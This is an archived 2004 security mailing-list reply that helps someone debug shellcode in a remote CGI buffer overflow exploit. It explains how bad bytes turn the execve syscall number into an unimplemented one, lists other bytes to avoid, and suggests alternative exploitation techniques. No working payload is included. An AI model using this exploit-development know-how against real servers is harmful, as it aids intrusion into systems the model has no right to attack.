Nmap Security Scanner
*Intro
*Ref Guide
*Install Guide
*Download
*Changelog
*Book
*Docs
Security Lists
*Nmap Hackers
*Nmap Dev
*Bugtraq
*Full Disclosure
*Pen Test
*Basics
*More
Security Tools
*Pass crackers
*Sniffers
*Vuln Scanners
*Web scanners
*Wireless
*Exploitation
*Packet crafters
*More
Site News
Site Search:
Exploit World
Advertising
About/Contact
Credits
Sponsors:
edgeos



Vulnerability Development: Re: Problem exploiting a CGI overflow

Re: Problem exploiting a CGI overflow

From: Marco Ivaldi <raptor_at_0xdeadbeef.info>
Date: Wed, 24 Nov 2004 12:14:55 +0100 (CET)

> I discover that the shellcode change during his execution. Yeah, some
> bytes of the shellcode change while is running. Why?? How can avoid
> this?

The problem here is that some bytes in the shellcode are converted into
0x20. Namely, 0x0b (execve syscall number) is converted into 0x20 (gtty
syscall number -- an unimplemented syscall), screwing up the execution of
your shell.

$ strace ./post2 <buffer
[...]
read(0, "", 4096) = 0
gtty(0xbffff7ec, 0xbffff7f4) = -1 ENOSYS (Function not
implemented)
_exit(0) = ?

The following special bytes pose similar problems: 0x09 ('\t'), 0x0a
('\n'), 0x0c ('\f') and 0x0d ('\r'). You should try to exploit the cgi
with a special shellcode (note that you may also need to close stdin and
re-open the tty -- see http://www.0xdeadbeef.info/code/gets-linux.c).

Since i suppose you wanna build a remote exploit, ret-into-envp is useless
here (i.e. you can't stuck your shellcode into the environment). Moreover,
i don't think chained ret-into-libc may be feasible...

I don't have enough time to play with that any further, but i hope you'll
be able to find a viable solution ;)

Cheers, 

-- 
Marco Ivaldi
Antifork Research, Inc.   http://0xdeadbeef.info/
3B05 C9C5 A2DE C3D7 4233  0394 EF85 2008 DBFD B707
Received on Nov 24 2004
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]
edgeos